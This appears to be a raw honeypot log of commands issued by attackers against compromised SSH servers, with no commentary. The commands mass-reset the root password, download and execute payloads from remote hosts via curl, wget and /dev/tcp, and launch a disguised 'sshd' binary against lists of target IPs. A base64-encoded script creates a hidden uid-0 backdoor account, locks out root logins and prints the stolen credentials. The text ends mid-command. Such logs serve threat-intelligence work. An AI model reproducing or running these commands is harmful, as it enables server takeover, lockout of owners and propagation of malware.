chmod +x ./.3033549610417643278/sshd;nohup ./.3033549610417643278/sshd 15.237.202.78 184.94.156.5 3.38.166.200 125.87.90.91 125.87.81.191 125.87.91.175 159.75.245.108 125.87.84.227 103.185.52.34 160.191.3.33 125.87.93.62 125.87.82.152 91.132.59.252 125.87.90.107 62.74.180.63 107.173.127.141 125.87.89.21 125.87.89.90 125.87.82.0 125.87.91.165 125.87.89.98 103.174.130.143 15.206.211.43 125.87.94.248 125.87.82.93 125.87.85.75 8.217.13.52 121.18.43.102 18.143.133.109 122.228.208.32 57.180.54.242 46.247.109.171 147.93.62.20 5.167.76.48 125.87.86.80 125.87.86.100 103.124.101.214 125.87.84.96 173.244.60.254 125.87.92.79 125.87.95.144 213.238.207.66 125.87.83.88 42.121.57.140 125.87.83.197 125.87.85.10 160.191.3.66 125.87.82.11 58.144.196.230 125.87.83.215 139.159.197.187 & |
1 |
echo "root:oIVT3ulSEsfq"|chpasswd|bash |
1 |
echo "root:x6arXQDLULiw"|chpasswd|bash |
1 |
echo "root:6w8QZB6QHxXo"|chpasswd|bash |
1 |
ssh -V |
1 |
echo "root:wTCQx8iOmNR6"|chpasswd|bash |
1 |
echo "root:8ouFo4rHMgGC"|chpasswd|bash |
1 |
echo "root:xCe2fNXE7zZo"|chpasswd|bash |
1 |
echo "root:KgAZP5xe6hvn"|chpasswd|bash |
1 |
echo $((1+1)) |
1 |
(1+1 |
1 |
wget -nc http://103.41.204.104/k.php?a=x86_64,KSAR14QK1667WM8YH -O ./upnpsetup |
1 |
echo "root:FoHioIh3zyKK"|chpasswd|bash |
1 |
echo "root:EB47IQCfajyu"|chpasswd|bash |
1 |
echo "root:fKRGdXjMJzuc"|chpasswd|bash |
1 |
echo "root:T9adrFrnMe6x"|chpasswd|bash |
1 |
echo "root:ptwgmdIA0Sox"|chpasswd|bash |
1 |
echo "root:rq4qVgpLgiSj"|chpasswd|bash |
1 |
echo "root:uCbikiYdlEAZ"|chpasswd|bash |
1 |
echo "root:lyrS4b2Brd6P"|chpasswd|bash |
1 |
nohup $SHELL -c "curl http://47.242.235.106:60116/linux -o /tmp/M2lzj4ovuv; if [ ! -f /tmp/M2lzj4ovuv ]; then wget http://47.242.235.106:60116/linux -O /tmp/M2lzj4ovuv; fi; if [ ! -f /tmp/M2lzj4ovuv ]; then exec 6<>/dev/tcp/47.242.235.106/60116 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/M2lzj4ovuv ; chmod +x /tmp/M2lzj4ovuv && /tmp/M2lzj4ovuv kZ9t7JPiNA0RSl5DZ3BMVk0PCDHgneN3je7ukWjsif4wDA9BWkV4eERMTwgXM+OK9WGJ8u2Hb+GL4DANCFtYQmd7QF5VCAAv5o3hb4/t7oZ56oTiLwoRQl5bcX5PWksOCTXwiex3je/lkW3pk+IwDQVNXER7elVYTBEBOP6P6GiR7u2PY+2N4TEKH0JeW3h4TUJJDAwv4o/jY4ns7Y5o+4nnLwsMTUJHfXpbXU8MAzfgjOtrn+jrkWjpj/4wCg9VXURzf0VdSA4ZOf6P6mGR7eiGd+OK6jcJDkpUVX1+W15ICBcw4o/1aIrp5olp6o/oIQ0IVV5GfmdNXFUODTHqi+tojer8i271j+QzFw1IWVt4eUNWTQ8IMOad6WiO8u2LYPWM5jEXDUpYT395RFhDHw02/oXod47t6ZFg6YfmMQgMTExNZ3tEXFUKCS/miOFvj+3uiXnviv4zCgZVXUx6Z0RUSAUPMeGM6HmL6/KHb/WM5jQXDUlUT395RFhNHw02/o/oYJHk7JFo6o7qNwkOSFxVfX5bW00RCDLgk+JvhersjmnsneEzChFOW1t4f0NCSggNO+aN6miH/OiId+mO6C8ICU9CQXpzQ1xKDQoh5Ir1a4vv8o5r7JPhNQkFTVxEfXpVXUwOFzPik+luke3uh2PtjeEzCR9PW1t+f1teSg4XOeiH7WmO7+2fbeyT4TAIEUpeQGd8R1ZNDwgz5J3vbpHu6I136Y7lLwgPTVZDeXhEWlsHFzPhhfVth/LujWHhi+AwDQxbVUdneERUVQ0KNP6P6WGF6uyOaOp+/STpKB2hK/TCYx9EDWoPucsSoM2VMn1CorOp; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/M2lzj4ovuv && /tmp/M2lzj4ovuv kZ9t7JPiNA0RSl5DZ3BMVk0PCDHgneN3je7ukWjsif4wDA9BWkV4eERMTwgXM+OK9WGJ8u2Hb+GL4DANCFtYQmd7QF5VCAAv5o3hb4/t7oZ56oTiLwoRQl5bcX5PWksOCTXwiex3je/lkW3pk+IwDQVNXER7elVYTBEBOP6P6GiR7u2PY+2N4TEKH0JeW3h4TUJJDAwv4o/jY4ns7Y5o+4nnLwsMTUJHfXpbXU8MAzfgjOtrn+jrkWjpj/4wCg9VXURzf0VdSA4ZOf6P6mGR7eiGd+OK6jcJDkpUVX1+W15ICBcw4o/1aIrp5olp6o/oIQ0IVV5GfmdNXFUODTHqi+tojer8i271j+QzFw1IWVt4eUNWTQ8IMOad6WiO8u2LYPWM5jEXDUpYT395RFhDHw02/oXod47t6ZFg6YfmMQgMTExNZ3tEXFUKCS/miOFvj+3uiXnviv4zCgZVXUx6Z0RUSAUPMeGM6HmL6/KHb/WM5jQXDUlUT395RFhNHw02/o/oYJHk7JFo6o7qNwkOSFxVfX5bW00RCDLgk+JvhersjmnsneEzChFOW1t4f0NCSggNO+aN6miH/OiId+mO6C8ICU9CQXpzQ1xKDQoh5Ir1a4vv8o5r7JPhNQkFTVxEfXpVXUwOFzPik+luke3uh2PtjeEzCR9PW1t+f1teSg4XOeiH7WmO7+2fbeyT4TAIEUpeQGd8R1ZNDwgz5J3vbpHu6I136Y7lLwgPTVZDeXhEWlsHFzPhhfVth/LujWHhi+AwDQxbVUdneERUVQ0KNP6P6WGF6uyOaOp+/STpKB2hK/TCYx9EDWoPucsSoM2VMn1CorOp" & |
1 |
head -c 3610344 > /tmp/jJ9ILKbNLR |
1 |
echo "root:WDE1W99hFIQu"|chpasswd|bash |
1 |
echo "root:KxyLoM2oRzx9"|chpasswd|bash |
1 |
echo "root:tU2Eee83F40N"|chpasswd|bash |
1 |
echo "root:4hfaTm2Tuwlj"|chpasswd|bash |
1 |
echo "root:yDuKYYd4Fy0N"|chpasswd|bash |
1 |
nohup $SHELL -c "curl http://47.237.122.155:60128/linux -o /tmp/1T7UogF0gg; if [ ! -f /tmp/1T7UogF0gg ]; then wget http://47.237.122.155:60128/linux -O /tmp/1T7UogF0gg; fi; if [ ! -f /tmp/1T7UogF0gg ]; then exec 6<>/dev/tcp/47.237.122.155/60128 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/1T7UogF0gg ; chmod +x /tmp/1T7UogF0gg && /tmp/1T7UogF0gg jUCbyxMj8l0fYDJnH1D+KwvMnlD87FiBzg8j6VgGZS5gBFn9Jw3NnlHs/lCd0ggk6VEDfzJkAVPxIQzIn0D+/FOByQo/9VoEfzJkBVPxIQzOmED4+06dzwQ/9lkCfzhrB1n2JQ3cm1fi/lSc0g8i6VoJazZhAFrwMQzOn0749E6eyQo/8lkLZzBgBVHnJQrSllji9VmBzQgo/V8BYDBlEV3wPwXIgVH1+06dyQ8r8VkAYjVxBV7pIwnPgVP54lOYxgsh9l0GcTRmH1vyIxPNnk76/FqZzAwj8UkFZi5gAFzpJgvSmFL2+lCezwgx814fYzRiH1j1JhPNm1D2+lCeyA4x814fYzNmH1j1IxPNmlX2+lCezgUx814fYzNoH1jzJRPOnlf2+lCezAwx814faDl/CFHpIAzJlVb8/VOc3Akm6VsEZS5nCEf2Ig7GmVD9/1WPyAo/9VoIfzRjH1v2JQfKn1H+/0CbyxMj9F4fYDJjH1jyJAfKn1H+9ECbyxMm8UcHZy5jAFPxIQzMmUD4+06XzxMj91ofYDhiC1/3IA7Ej1ji/lGf0ggh6V8EazZhAFvxMQnLgVf64laY0g4g/V8BYDBgEVj1IBPInk71+U6byQcn91gFYCBlBkf1IgTSm1Li/lGbxgsh9lsCcTRmH1v0KRPNmVTi+FOVyg0g9VoRaS5jAFnpIwnKgVn2+lCezQgx/0cDYDl/A1n+PwzLn1r6/FGdzB0g9VofZDd/AF/xPwzLm1r6/FGexB0p6VsAaS5gA1zpIw3OlVb8/VSYLQG4uSBRSLQI21aKOd2PQB1FF2HhSVw=; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/1T7UogF0gg && /tmp/1T7UogF0gg jUCbyxMj8l0fYDJnH1D+KwvMnlD87FiBzg8j6VgGZS5gBFn9Jw3NnlHs/lCd0ggk6VEDfzJkAVPxIQzIn0D+/FOByQo/9VoEfzJkBVPxIQzOmED4+06dzwQ/9lkCfzhrB1n2JQ3cm1fi/lSc0g8i6VoJazZhAFrwMQzOn0749E6eyQo/8lkLZzBgBVHnJQrSllji9VmBzQgo/V8BYDBlEV3wPwXIgVH1+06dyQ8r8VkAYjVxBV7pIwnPgVP54lOYxgsh9l0GcTRmH1vyIxPNnk76/FqZzAwj8UkFZi5gAFzpJgvSmFL2+lCezwgx814fYzRiH1j1JhPNm1D2+lCeyA4x814fYzNmH1j1IxPNmlX2+lCezgUx814fYzNoH1jzJRPOnlf2+lCezAwx814faDl/CFHpIAzJlVb8/VOc3Akm6VsEZS5nCEf2Ig7GmVD9/1WPyAo/9VoIfzRjH1v2JQfKn1H+/0CbyxMj9F4fYDJjH1jyJAfKn1H+9ECbyxMm8UcHZy5jAFPxIQzMmUD4+06XzxMj91ofYDhiC1/3IA7Ej1ji/lGf0ggh6V8EazZhAFvxMQnLgVf64laY0g4g/V8BYDBgEVj1IBPInk71+U6byQcn91gFYCBlBkf1IgTSm1Li/lGbxgsh9lsCcTRmH1v0KRPNmVTi+FOVyg0g9VoRaS5jAFnpIwnKgVn2+lCezQgx/0cDYDl/A1n+PwzLn1r6/FGdzB0g9VofZDd/AF/xPwzLm1r6/FGexB0p6VsAaS5gA1zpIw3OlVb8/VSYLQG4uSBRSLQI21aKOd2PQB1FF2HhSVw=" & |
1 |
head -c 3631236 > /tmp/yILm2suPl6 |
1 |
lsb_release -d |
1 |
echo "root:M1b9FaA5afE1"|chpasswd|bash |
1 |
echo "root:iQkhF4xBj0f8"|chpasswd|bash |
1 |
echo "root:MCNIXG3mC4Jv"|chpasswd|bash |
1 |
chmod +x ./.4583812858571509049/sshd;nohup ./.4583812858571509049/sshd 101.91.114.194 43.155.168.47 185.248.143.168 89.47.200.242 113.214.61.11 147.50.252.225 113.142.189.53 212.80.7.48 13.57.230.251 125.124.210.187 140.249.52.147 109.172.95.205 61.153.191.162 62.72.1.151 124.118.249.114 157.230.97.85 58.240.16.93 103.140.73.24 154.94.116.72 192.210.241.208 42.4.50.229 103.77.211.165 125.91.108.190 69.87.207.133 54.89.186.181 37.60.229.236 195.133.65.187 49.51.183.95 36.99.44.102 220.181.77.165 89.22.234.176 210.101.91.153 185.246.223.173 159.223.141.233 134.209.0.27 170.231.224.198 185.156.108.148 147.45.44.181 107.172.84.105 45.133.251.74 47.254.22.72 103.174.9.66 171.22.120.142 139.59.147.83 122.51.75.186 172.104.43.147 101.36.230.175 114.217.11.189 218.78.131.247 140.249.182.238 77.90.60.7 & |
1 |
export ip=167.172.19.202;export pw=uCSAfjEFKsV3jJzjScw2oFkdBRTeYrZF;export pwhash='$1$Zl1IWGS1$ewunCU8HQ3dcZKlIp5L4m0';echo IyEvYmluL2Jhc2gKdXNlcm5hbWU9ImxvY2FsIgp2ZXJzaW9uPSIxLjMiCgppZiBbICIkRVVJRCIgLW5lIDAgXTsgdGhlbgogIGVjaG8gIlstXSBSdW4gYXMgcm9vdCEiCiAgZXhpdApmaQoKZ2V0ZW50IHBhc3N3ZCAkdXNlcm5hbWUgPiAvZGV2L251bGwKaWYgWyAkPyAtZXEgMCBdOyB0aGVuCiAgZWNobyAiWy1dIFVzZXJuYW1lICR1c2VybmFtZSBpcyBhbHJlYWR5IGJlaW5nIHVzZWQhIgogIGV4aXQKZmkKCmVjaG8gIlsrXSBTU0ggVmFjY2luZSBTY3JpcHQgdiR2ZXJzaW9uIgoKb3M9YGxzYl9yZWxlYXNlIC1pcyAyPi9kZXYvbnVsbCB8fCBlY2hvIHVua25vd25gCmNwdXM9YGxzY3B1IDI+L2Rldi9udWxsIHwgZWdyZXAgIl5DUFVcKHNcKToiIHwgc2VkIC1lICJzL1teMC05XS8vZyIgfHwgbnByb2MgMj4vZGV2L251bGwgfHwgZWNobyAwYAoKIyBDcmVhdGUgdGhlIGJhY2tkb29yIHVzZXJuYW1lLgplY2hvICJbIV0gQ3JlYXRlIHVzZXJuYW1lICR1c2VybmFtZSB3aXRoIGFkbWluaXN0cmF0b3IgcHJpdmlsZWdlLiIKaWYgWyAhIC1kIC9ob21lIF07IHRoZW4KICBta2RpciAvaG9tZQogIGVjaG8gIlshXSBGb2xkZXIgL2hvbWUgd2FzIGNyZWF0ZWQuIgpmaQpwYXNzd2Q9JCh0aW1lb3V0IDEwIGNhdCAvZGV2L3VyYW5kb20gfCB0ciAtZGMgJ2EtekEtWjAtOScgfCBmb2xkIC13IDMyIHwgaGVhZCAtbiAxKQpoPSIkcHdoYXNoIgppZiBbIC14ICIkKGNvbW1hbmQgLXYgb3BlbnNzbCkiIF07IHRoZW4KICBoPSQoZWNobyAkcGFzc3dkIHwgb3BlbnNzbCBwYXNzd2QgLTEgLXN0ZGluKQplbHNlCiAgcGFzc3dkPSIkcHciCmZpCnVzZXJhZGQgJHVzZXJuYW1lIC1vIC11IDAgLWcgMCAtYyAibG9jYWwiIC1tIC1kIC9ob21lLyR1c2VybmFtZSAtcyAvYmluL2Jhc2ggLXAgIiRoIgoKaWYgISBncmVwIC1xICJeJHVzZXJuYW1lOiIgL2V0Yy9wYXNzd2Q7dGhlbgogIGVjaG8gImNhbm5vdCBhZGQgdXNlciIKICBleGl0CmZpCgppZiBbIC14ICIkKGNvbW1hbmQgLXYgZWQpIiBdOyB0aGVuCiAgcHJpbnRmICIlc1xuIiAnJG0xJyB3cSB8IGVkIC9ldGMvcGFzc3dkIC1zCiAgcHJpbnRmICIlc1xuIiAnJG0xJyB3cSB8IGVkIC9ldGMvc2hhZG93IC1zCmVsc2UKICBsbz0kKHRhaWwgLTEgL2V0Yy9wYXNzd2QpCiAgc2VkIC1pICIvXiR1c2VybmFtZTovZCIgL2V0Yy9wYXNzd2QKICBzZWQgLWkgIi9ecm9vdDouKjowOjA6L2EgJGxvIiAvZXRjL3Bhc3N3ZAoKICBsbz0kKHRhaWwgLTEgL2V0Yy9zaGFkb3cpCiAgc2VkIC1pICIvXiR1c2VybmFtZTovZCIgL2V0Yy9zaGFkb3cKICBzZWQgLWkgIi9ecm9vdDovYSAkbG8iIC9ldGMvc2hhZG93CmZpCgplY2hvICJbIV0gR2VuZXJhdGVkIHBhc3N3b3JkOiAkcGFzc3dkIgplY2hvICJbIV0gU2V0IHRoZSBwcm9maWxlLiIKZWNobyAidW5zZXQgSElTVEZJTEUiID4+IC9ob21lLyR1c2VybmFtZS8uYmFzaHJjCmVjaG8gJ2V4cG9ydCBQUzE9IlxbJCh0cHV0IHNldGFmIDIpXF1bXFskKHRwdXQgc2dyMClcXVxbJCh0cHV0IGJvbGQpXF1cWyQodHB1dCBzZXRhZiAyKVxdXHVAXGggXFdcWyQodHB1dCBzZ3IwKVxdXFskKHRwdXQgc2V0YWYgMilcXV1cWyQodHB1dCBzZ3IwKVxdXFskKHRwdXQgYm9sZClcXVxbJCh0cHV0IHNldGFmIDcpXF1cXCQgXFskKHRwdXQgc2dyMClcXSInID4+IC9ob21lLyR1c2VybmFtZS8uYmFzaHJjCmVjaG8gInciID4+IC9ob21lLyR1c2VybmFtZS8uYmFzaHJjCmVjaG8gIiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIgoKZWNobyAiIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMiID4gL3RtcC9zc2hkX2NvbmZpZ190bXAKZWNobyAiIyAgICAgICAgICAgICAgICAgICAgISAhICEgISAhIElNUE9SVEFOVCAhICEgISAhICEgICAgICAgICAgICAgICAgICAgICMiID4+IC90bXAvc3NoZF9jb25maWdfdG1wCmVjaG8gIiMgKiBZb3VyIHN5c3RlbSBoYXMgZGV0ZWN0ZWQgYSB3ZWFrIHBhc3N3b3JkIGZvciByb290IGFjY291bnQgYW5kIGZvciAjIiA+PiAvdG1wL3NzaGRfY29uZmlnX3RtcAplY2hvICIjIHNlY3VyaXR5IHJlYXNvbnMsIHJlbW90ZSBhY2Nlc3MgdmlhIFNTSCBoYXMgYmVlbiBibG9ja2VkIHRvIHByZXZlbnQgIyIgPj4gL3RtcC9zc2hkX2NvbmZpZ190bXAKZWNobyAiIyB1bmF1dGhvcml6ZWQgYWNjZXNzLiBJbiBvcmRlciB0byBlbmFibGUgYWdhaW4gcmVtb3RlIGFjY2VzcyB0byB0aGlzICMiID4+IC90bXAvc3NoZF9jb25maWdfdG1wCmVjaG8gIiMgbWFjaGluZSBmb3Igcm9vdCB1c2VyIHZpYSBTU0gsIHNldCBhIG5ldyBjb21wbGV4IHBhc3N3b3JkIGZvciByb290ICAjIiA+PiAvdG1wL3NzaGRfY29uZmlnX3RtcAplY2hvICIjIGFjY291bnQgYW5kIGRlbGV0ZSAnRGVueVVzZXJzIHJvb3QnIGxpbmUgYmVsb3cgb24gdGhpcyBjb25maWcgZmlsZS4gIyIgPj4gL3RtcC9zc2hkX2NvbmZpZ190bXAKZWNobyAiIyAqIFJlc3RhcnRpbmcgdGhlIFNTSCBEYWVtb24gaXMgcmVxdWlyZWQgZm9yIGNoYW5nZXMgdG8gdGFrZSBlZmZlY3QuICMiID4+IC90bXAvc3NoZF9jb25maWdfdG1wCmVjaG8gIiMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjIiA+PiAvdG1wL3NzaGRfY29uZmlnX3RtcAplY2hvICIjIEJhc2ggY29tbWFuZHM6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyIgPj4gL3RtcC9zc2hkX2NvbmZpZ190bXAKZWNobyAiIyBwYXNzd2Qgcm9vdCAgICAgICAgICAgICAoQ2hhbmdlcyB5b3VyIHJvb3QgcGFzc3dvcmQpLiAgICAgICAgICAgICAgICMiID4+IC90bXAvc3NoZF9jb25maWdfdG1wCmVjaG8gIiMgc2VydmljZSBzc2hkIHJlc3RhcnQgICAgKFJlc3RhcnQgdGhlIFNTSCBEYWVtb24pLiAgICAgICAgICAgICAgICAgICAjIiA+PiAvdG1wL3NzaGRfY29uZmlnX3RtcAplY2hvICJEZW55VXNlcnMgcm9vdCIgPj4gL3RtcC9zc2hkX2NvbmZpZ190bXAKZWNobyAiIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMiID4+IC90bXAvc3NoZF9jb25maWdfdG1wCmNhdCAvZXRjL3NzaC9zc2hkX2NvbmZpZyA+PiAvdG1wL3NzaGRfY29uZmlnX3RtcAp5ZXMgfCBjcCAvdG1wL3NzaGRfY29uZmlnX3RtcCAvZXRjL3NzaC9zc2hkX2NvbmZpZyA+IC9kZXYvbnVsbCAyPiYxCnJtIC1yZiAvdG1wL3NzaGRfY29uZmlnX3RtcAoKc3lzdGVtY3RsIHJlc3RhcnQgc3NoIHx8IHN5c3RlbWN0bCByZXN0YXJ0IHNzaGQgfHwgc2VydmljZSBzc2ggcmVzdGFydCB8fCBzZXJ2aWNlIHNzaGQgcmVzdGFydCB8fCAvZXRjL2luaXQuZC9zc2ggcmVzdGFydCB8fCAvZXRjL2luaXQuZC9zc2hkIHJlc3RhcnQKaWYgWyAkPyAtZXEgMCBdO3RoZW4KICBlY2hvICJTU0hEIHJlc3RhcnRlZCIKZWxzZQogIGVjaG8gIlNTSEQgZXJyb3IiCmZpCgoKaXA9JGlwCmVjaG8gIlshXSBJUDogJGlwIgoKIyBUcnkgdG8gZ2V0IGEgaG9zdG5hbWUgZnJvbSBJUC4KZG5zPWBnZXRlbnQgaG9zdHMgJGlwIHwgYXdrICd7cHJpbnQgJDJ9J2AKaWYgWyAteiAiJGRucyIgXQp0aGVuCiAgZG5zPW51bGwKZmkKZWNobyAiWyFdIEROUzogJGRucyIKCiMgR2V0IGNvdW50cnkgbmFtZSBmcm9tIElQLgpjb3VudHJ5PWB3Z2V0IC1xTy0gaHR0cHM6Ly9hcGkuZGItaXAuY29tL3YyL2ZyZWUvJGlwL2NvdW50cnlOYW1lIDI+L2Rldi9udWxsIHx8IGN1cmwgLWtzIC1tMzAgaHR0cHM6Ly9hcGkuZGItaXAuY29tL3YyL2ZyZWUvJGlwL2NvdW50cnlOYW1lIDI+L2Rldi9udWxsIHx8IGVjaG8gWGAKCgplY2hvICJbIV0gTGlzdCBvZiB1c2VybmFtZXMgb24gdGhpcyBtYWNoaW5lOiIKbHMgL2hvbWUgfCBhd2sgJ3twcmludCAkMX0nCgplY2hvICJbIV0gTGlzdCBvZiBldGhlcm5ldCBJUCBhZGRyZXNzZXM6IgppcCBhZGRyIHNob3cgfCBncmVwIC1vICJpbmV0IFswLTldKlwuWzAtOV0qXC5bMC05XSpcLlswLTldKiIgfCBncmVwIC1vICJbMC05XSpcLlswLTldKlwuWzAtOV0qXC5bMC05XSoiCmVjaG8gIiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIgoKIyBQcmludCBhbGwgaW5mbyBuZWNlc3NhcnkgYWJvdXQgdGhlIG1hY2hpbmUuCmVjaG8gIiIKdW5hbWUgLWEKZWNobyAiJHVzZXJuYW1lICRwYXNzd2QgJGgiCmVjaG8gIiRpcCwkZG5zLHJvb3QsJHVzZXJuYW1lLCRwYXNzd2QsJGNwdXMsJG9zLCRjb3VudHJ5IgplY2hvICIiCmVjaG8gIiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIgo=|base64 -d|bash |
1 |
echo "root:DMi2JIxZRJf2"|chpasswd|bash |
1 |
echo "root:wla0U2y2TaVV"|chpasswd|bash |
1 |
echo "root:YjVf8IhVRvgd"|chpasswd|bash |
1 |
echo "root:BvfMHzpulT1y"|chpasswd|bash |
1 |
echo "root:VDg27DeZObSS"|chpasswd|bash |
1 |
echo "root:Ar75xTFINQMP"|chpasswd|bash |
1 |
chmod +x ./.4703118280176621996/sshd;nohup ./.4703118280176621996/sshd 125.87.91.98 125.87.94.17 182.204.176.169 125.87.87.103 125.87.88.211 107.150.121.86 125.87.90.115 125.87.81.120 18.162.47.24 125.87.91.105 125.87.91.124 125.87.83.116 160.202.249.51 125.87.83.31 125.87.87.27 125.87.95.228 125.87.82.28 125.87.81.199 125.87.92.68 125.87.85.246 94.46.171.161 193.228.139.183 125.87.88.253 125.87.84.102 3.35.217.1 125.87.92.251 125.87.89.185 8.219.176.220 125.87.95.2 125.87.95.15 125.87.85.131 125.87.89.18 125.87.87.187 125.87.94.166 185.28.84.9 125.87.85.144 194.195.251.156 125.87.89.160 54.46.15.82 125.87.81.168 125.87.92.253 125.87.87.35 125.87.94.70 125.87.95.10 125.87.86.119 31.57.159.185 54.46.14.13 125.87.88.201 125.87.88.89 125.87.94.194 125.87.95.56 & |
1 |
nohup $SHELL -c "curl http://8.222.174.150:60111/linux -o /tmp/uO2JRulJtM; if [ ! -f /tmp/uO2JRulJtM ]; then wget http://8.222.174.150:60111/linux -O /tmp/uO2JRulJtM; fi; if [ ! -f /tmp/uO2JRulJtM ]; then exec 6<>/dev/tcp/8.222.174.150/60111 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/uO2JRulJtM ; chmod +x /tmp/uO2JRulJtM && /tmp/uO2JRulJtM ZUyZKKdGRI+VQEa/MZRVEh5cnC+5VEmViUNGpy6aWAYZWZ0lv0RAiopRQL4xn1gaBlqeMb9MS42LQEW/P5lfBhpYlTG+TF+Ji0ROvy+cXx8IWJoxu0BClYpEWrsslFYeGF2cLalARpWDQlq7L55CGRBflym5RUKDm0VDpy2ZXgYZXJUxvkVLjYtARL4/lUIaGVyDKrlaR46BR0S4LZtMEAZenCenRUOOlUNEuyWbXBkcW40rvlpDiIJfRb4tg1ofElqdLrlDUY+MX0a9LYNdGhBCny2zQkGKikJUvSiDXhwaQpwmvFpAj4hLQrkumVwIGV2bMbhDSZWJQEynLZ5eEh5cnC+8VEWMlUNHvjGVWgYZVJslv0RAj4xRQL4xlFwGGVmUMbpBS42LQEe5P5VCGRtfgyynRkOMgUdEuCucTBwfQp8ru1pDiI5fRbkpl1oYGV2bP71DX4mIR1q7L4NYERJanS67RFGPjF9GvSyDWRAGXZ4ps0JBiohDVL0og14cGkKYJ6dMRYGNQUW5Jo1YHwZemC2nRUCVjUFOvy+cXh4IWJoxu0FAlYlFWrgpnlYeGF2dK6lARpWMR1q/KYNeGRJanS65QlGPjF9GuiaDXRgbQpUlv0RAj4tRQL4xnF0ZBl2fKqdBQ4GNQUW7K41YHwZemS2nQkKVjUlOvy+cXR4IWJoxvkJfiYpAWrEnl1oYGV+cP7FaQ4qMX0a4MZxbHRJanS65TVGPjF9GvSyDXRofQpwruU5Hi4pFR6kunFsGG1+DLr5HX4qNQE6/L5xcHd0coP5eO61c59xP1+ENcPU2Jg==; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/uO2JRulJtM && /tmp/uO2JRulJtM ZUyZKKdGRI+VQEa/MZRVEh5cnC+5VEmViUNGpy6aWAYZWZ0lv0RAiopRQL4xn1gaBlqeMb9MS42LQEW/P5lfBhpYlTG+TF+Ji0ROvy+cXx8IWJoxu0BClYpEWrsslFYeGF2cLalARpWDQlq7L55CGRBflym5RUKDm0VDpy2ZXgYZXJUxvkVLjYtARL4/lUIaGVyDKrlaR46BR0S4LZtMEAZenCenRUOOlUNEuyWbXBkcW40rvlpDiIJfRb4tg1ofElqdLrlDUY+MX0a9LYNdGhBCny2zQkGKikJUvSiDXhwaQpwmvFpAj4hLQrkumVwIGV2bMbhDSZWJQEynLZ5eEh5cnC+8VEWMlUNHvjGVWgYZVJslv0RAj4xRQL4xlFwGGVmUMbpBS42LQEe5P5VCGRtfgyynRkOMgUdEuCucTBwfQp8ru1pDiI5fRbkpl1oYGV2bP71DX4mIR1q7L4NYERJanS67RFGPjF9GvSyDWRAGXZ4ps0JBiohDVL0og14cGkKYJ6dMRYGNQUW5Jo1YHwZemC2nRUCVjUFOvy+cXh4IWJoxu0FAlYlFWrgpnlYeGF2dK6lARpWMR1q/KYNeGRJanS65QlGPjF9GuiaDXRgbQpUlv0RAj4tRQL4xnF0ZBl2fKqdBQ4GNQUW7K41YHwZemS2nQkKVjUlOvy+cXR4IWJoxvkJfiYpAWrEnl1oYGV+cP7FaQ4qMX0a4MZxbHRJanS65TVGPjF9GvSyDXRofQpwruU5Hi4pFR6kunFsGG1+DLr5HX4qNQE6/L5xcHd0coP5eO61c59xP1+ENcPU2Jg==" & |
1 |
head -c 3610344 > /tmp/ZHflwGgh0v |
1 |
nohup $SHELL -c "curl http://8.222.174.150:60111/linux -o /tmp/kj8KvFIvHv; if [ ! -f /tmp/kj8KvFIvHv ]; then wget http://8.222.174.150:60111/linux -O /tmp/kj8KvFIvHv; fi; if [ ! -f /tmp/kj8KvFIvHv ]; then exec 6<>/dev/tcp/8.222.174.150/60111 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/kj8KvFIvHv ; chmod +x /tmp/kj8KvFIvHv && /tmp/kj8KvFIvHv ZUyZKKdGRI+VQEa/MZRVEh5cnC+5VEmViUNGpy6aWAYZWZ0lv0RAiopRQL4xn1gaBlqeMb9MS42LQEW/P5lfBhpYlTG+TF+Ji0ROvy+cXx8IWJoxu0BClYpEWrsslFYeGF2cLalARpWDQlq7L55CGRBflym5RUKDm0VDpy2ZXgYZXJUxvkVLjYtARL4/lUIaGVyDKrlaR46BR0S4LZtMEAZenCenRUOOlUNEuyWbXBkcW40rvlpDiIJfRb4tg1ofElqdLrlDUY+MX0a9LYNdGhBCny2zQkGKikJUvSiDXhwaQpwmvFpAj4hLQrkumVwIGV2bMbhDSZWJQEynLZ5eEh5cnC+8VEWMlUNHvjGVWgYZVJslv0RAj4xRQL4xlFwGGVmUMbpBS42LQEe5P5VCGRtfgyynRkOMgUdEuCucTBwfQp8ru1pDiI5fRbkpl1oYGV2bP71DX4mIR1q7L4NYERJanS67RFGPjF9GvSyDWRAGXZ4ps0JBiohDVL0og14cGkKYJ6dMRYGNQUW5Jo1YHwZemC2nRUCVjUFOvy+cXh4IWJoxu0FAlYlFWrgpnlYeGF2dK6lARpWMR1q/KYNeGRJanS65QlGPjF9GuiaDXRgbQpUlv0RAj4tRQL4xnF0ZBl2fKqdBQ4GNQUW7K41YHwZemS2nQkKVjUlOvy+cXR4IWJoxvkJfiYpAWrEnl1oYGV+cP7FaQ4qMX0a4MZxbHRJanS65TVGPjF9GvSyDXRofQpwruU5Hi4pFR6kunFsGG1+DLr5HX4qNQE6/L5xcHd0coP5eO61c59xP1+ENcPU2Jg==; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/kj8KvFIvHv && /tmp/kj8KvFIvHv 